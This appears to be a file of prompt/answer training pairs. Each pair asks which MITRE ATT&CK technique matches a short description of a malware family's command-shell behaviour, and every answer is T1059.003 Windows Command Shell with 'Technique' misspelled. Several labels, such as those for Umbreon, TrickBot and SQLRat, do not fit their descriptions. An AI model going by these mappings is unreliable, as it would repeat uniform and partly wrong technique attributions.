+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar uses cmd.exe to execute commands on the victim’s machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kevin can use a renamed image of `cmd.exe` for execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KeyBoy can launch interactive shells for communicating with the victim machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic can open an interactive command-shell to perform command line functions on victim machines. Koadic performs most of its operations using Windows Script Host (Jscript) and to run arbitrary shellcode.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LightNeuron is capable of executing commands via cmd.exe.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Linfo creates a backdoor through which remote attackers can start a remote shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar has a command to open the command-line on the infected system.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot has used cmd /c commands embedded within batch scripts.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LookBack executes the cmd.exe command.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoudMiner used a batch script to run the Linux virtual machine as a service.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can issue shell commands to download and execute additional payloads.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MCMD can launch a console process (cmd.exe) with redirected standard input and output.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MURKYTOP uses the command-line interface.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mafalda can execute shell commands using `cmd.exe`.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can utilize cmd.exe to execute commands in a victim's environment.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Maze encryption process has used batch scripts with various commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MechaFlounder has the ability to run commands on a compromised host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MegaCortex has used .cmd scripts on the victim's system.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has used cmd.exe /c to execute files.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor can run `set.bat`, `update.bat`, `cache.bat`, `bcd.bat`, `msrun.bat`, and similar scripts.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Micropsia creates a command-line shell using cmd.exe.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan can use `cmd.exe` for discovery actions on a targeted system.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MirageFox has the capability to execute commands using cmd.exe.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mis-Type has used `cmd.exe` to run commands on a compromised host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Misdat is capable of providing shell functionality to the attacker to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mivast has the capability to open a remote shell and run basic commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoleNet can execute commands via the command line utility.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoonWind can execute commands via an interactive command shell. MoonWind uses batch scripts for various purposes, including to restart and uninstall itself.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: More_eggs has used cmd.exe for execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mosquito executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETEAGLE allows adversaries to execute shell commands on the infected host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can issue commands using cmd.exe.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanoCore can open a remote command-line interface and execute commands. NanoCore uses JavaScript files.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NavRAT leverages cmd.exe to perform discovery techniques. NavRAT loads malicious shellcode and executes it in memory.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nebulae can use CMD to execute a process.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Operators deploying Netwalker have used batch scripts to retrieve the Netwalker payload.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OceanSalt can create a reverse shell on the infected endpoint using cmd.exe. OceanSalt has been executed via malicious macros.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum's backdoor has used cmd.exe to execute arbitrary commands as well as batch scripts to update itself to a newer version.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE uses the command prompt to execute commands on the victim's machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Orz can execute shell commands. Orz can execute commands with JavaScript.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Out1 can use native command line for execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OutSteel has used `cmd.exe` to scan a compromised host for specific file extensions.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PHOREAL is capable of creating reverse shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLAINTEE uses cmd.exe to execute commands on the victim’s machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLEAD has the ability to execute shell commands on the compromised host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER can execute commands from its C2 server.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PcShare can execute `cmd` commands on a compromised host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Peppy has the ability to execute shell commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PingPull can use `cmd.exe` to run various commands as a reverse shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pisloader uses cmd.exe to set the Registry Run key value. It also has a command to spawn a command shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX allows actors to spawn a reverse shell on a victim.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has called cmd through a Word document macro.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoisonIvy creates a backdoor through which remote attackers can open a command-line interface.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pony has used batch scripts to delete itself after execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerDuke runs cmd.exe /c and sends the output to its C2.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proxysvc executes a binary on the system and logs the results into a temp file by using: cmd.exe /c "" > %temp%\PM* .tmp 2>&1"" .","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pteranodon can use `cmd.exe` for execution on victim systems.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PyDCrypt has used `cmd.exe` for execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUADAGENT uses cmd.exe to execute scripts and commands on the victim’s machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can use cmd.exe to launch itself and to execute multiple C2 commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT can launch a remote shell to execute commands on the victim’s machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RATANKBA uses cmd.exe to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession can use `cmd.exe` for execution on compromised hosts.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RDAT has executed commands using cmd.exe /c.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can use the Windows command line to delete volume shadow copies and disable recovery.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RGDoor uses cmd.exe to execute commands on the victim’s machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM uses the command line and rundll32.exe to execute.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ragnar Locker has used cmd.exe and batch scripts to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can use the Windows Command Shell for execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RedLeaves can receive and execute commands with cmd.exe. It can also provide a reverse shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remcos can launch a remote command line to execute commands on the victim’s machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remexi silently executes received commands with cmd.exe.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT uses cmd.exe to execute commands and run scripts on the victim's machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rising Sun has executed commands using `cmd.exe /c “ > <%temp%>\AM. tmp” 2>&1`.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RobbinHood uses cmd.exe on the victim's computer.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RogueRobin uses Windows Script Components.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RunningRAT uses a batch file to kill a security program task and then attempts to remove itself.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk has used cmd.exe to create a Registry entry to establish persistence.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: S-Type has provided the ability to execute shell commands on a compromised host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SDBbot has the ability to use the command shell to execute commands on a compromised host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SEASHARPEE can execute commands on victims.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SILENTTRINITY can use `cmd.exe` to enable lateral movement using DCOM.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SLOTHFULMEDIA can open a command line to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SNUGRIDE is capable of executing commands and spawning a reverse shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SQLRat has used SQL to execute JavaScript and VB scripts on the host system.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: STARWHALE has the ability to execute commands via `cmd.exe`.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUGARUSH has used `cmd` for execution on an infected host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SYSCON has the ability to execute commands through cmd on a compromised host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has used `cmd.exe` and `.bat` scripts for execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sakula calls cmd.exe to run various DLL files via rundll32 and also to perform file cleanup. Sakula also has the capability to invoke a reverse shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SamSam uses custom batch scripts to execute some of its components.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Samurai can use a remote command module for execution via the Windows command line.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sardonic has the ability to run `cmd.exe` or other interactive processes on a compromised computer.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SeaDuke is capable of executing commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Seasalt uses cmd.exe to create a reverse shell on the infected endpoint.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ServHelper can execute shell commands against cmd.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Seth-Locker can execute commands via the command line shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shark has the ability to use `CMD` to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpDisco can use `cmd.exe` to execute plugins and to send command output to specified SMB shares.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpStage can execute arbitrary commands with the command line.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ShimRat can be issued a command shell function from the C2.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SideTwist can execute shell commands on a compromised host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Siloscape can run cmd through an IRC channel.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Small Sieve can use `cmd.exe` to execute commands on a victim's system.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Spark can use cmd.exe to run commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Squirrelwaffle has used `cmd.exe` for execution.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StreamEx has the ability to remotely execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: StrifeWater can execute shell commands using `cmd.exe`.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TAINTEDSCRIBE can enable Windows CLI access and execute files.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TDTESS provides a reverse shell on the victim.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TEXTMATE executes cmd.exe to provide a reverse shell to adversaries.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TSCookie has the ability to execute shell commands on the infected host.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TURNEDUP is capable of creating a reverse shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TYPEFRAME can uninstall malware components using a batch script. TYPEFRAME can execute commands using a shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Taidoor can copy cmd.exe into the system temp folder.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tarrask may abuse the Windows schtasks command-line tool to create ""hidden"" scheduled tasks.","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyTurla has been installed using a .bat file.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TinyZBot supports execution from the command-line.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot has used macros in Excel documents to download and deploy the malware on the user’s machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Karagany can perform reconnaissance commands on a victim machine via a cmd.exe process.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turian can create a remote shell and execute commands using cmd.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UBoatRAT can start a command shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: UPPERCUT uses cmd.exe to execute commands on the victim’s machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: USBferry can execute various Windows commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Umbreon provides access using both standard facilities like SSH and additional access using its backdoor Espeon, providing a reverse shell upon receipt of a special packet","Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Uroburos has the ability to use the command line for execution on the targeted system.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Volgmer can execute commands on the victim's machine.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WEBC2 can open an interactive command shell.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WarzoneRAT can use `cmd.exe` to execute malicious code.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WastedLocker has used cmd to execute commands on the system.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WellMess can execute command line scripts received from C2.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate can use `cmd.exe` to execute commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wiarp creates a backdoor through which remote attackers can open a command line interface.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Woody RAT can execute commands using `cmd.exe`.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XTunnel has been used to execute remote commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZLib has the ability to execute shell commands.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy uses cmd.exe to execute commands on the system.,"Tecnique: T1059.003 Command and Scripting Interpreter: Windows Command Shell, Tactic: TA0002 Execution"
